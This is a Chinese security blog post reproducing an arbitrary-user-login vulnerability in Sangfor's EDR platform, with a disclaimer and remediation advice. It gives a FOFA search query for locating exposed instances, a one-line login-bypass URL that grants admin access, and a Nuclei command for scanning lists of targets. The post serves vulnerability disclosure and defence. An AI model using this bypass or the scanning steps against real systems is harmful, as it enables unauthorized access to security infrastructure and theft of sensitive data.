漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

admin 2023年6月19日13:43:01评论128 views字数 1245阅读4分9秒阅读模式

点击上方蓝字关注我们

BEGINNING OF SPRING

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

0x01

      阅读须知       

Reading Instructions

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

    数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。

    郑重声明:本文所提供的工具与思路仅用于学习与研究,禁止用于非法目的!
团队已致电客户说明并告知详细解决方案!
漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

0x02

       漏洞概述      

Vulnerability Overview



  深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统

  该EDR系统存在任意用户登录漏洞,攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息。



漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

0x03

       漏洞复现      

Vulnerability Recurrence

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

fofa:title="终端检测响应平台"




执行如下POC,可直接通过以admin权限登录后台,进而获取敏感信息。

{{BaseURL}}/ui/login.php?user=admin
其中BaseURL为目标漏洞平台的实际地址或域名


漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

(文章仅限技术交流,禁止非授权操作!)

0x04

     漏洞脚本     

Vulnerability script



1.Nuclei验证脚本命令使用如下:

nuclei.exe -t Sangfor_login_Any_user_login.yaml -l Sangfor_login_Any_user_login_Subs.txt--------------------------------------------Sangfor_login_Any_user_login_Subs.txt可以结合实际情况自定义--------------------------------------------




2.Nuclei的运行截图如下:

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞





3.关注公众号获取脚本并回复:深信服EDR



0x05

     修复建议     

Repair Suggestions



1.实施产品的权限访问控制,降低互联网搜索引擎的查询。





2.加强后台认证要求(如AAAA策略等),提高口令的安全性。





3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。




漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

往期推荐 · 值得阅看

2023全网最优渗透研学靶场汇总(上)

2023-02-23

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

详细ChatGPT安装之路,等你去体验!

2023-02-11

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

漏洞复现|用友GRP-U8存在文件上传漏洞

2023-05-05

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

漏洞预警|杭州安恒明御安全网关存在命令执行漏洞

2023-05-16

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

漏洞复现|金蝶OA存在目录遍历漏洞

2023-05-31

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

漏洞复现|联软科技安全准入门户平台存在远程代码执行漏洞

2023-06-02

漏洞复现|深信服科技EDR平台存在任意用户登录漏洞


END

原文始发于微信公众号(数字人才创研院):漏洞复现|深信服科技EDR平台存在任意用户登录漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月19日13:43:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|深信服科技EDR平台存在任意用户登录漏洞http://cn-sec.com/archives/1802765.html

发表评论

匿名网友 填写信息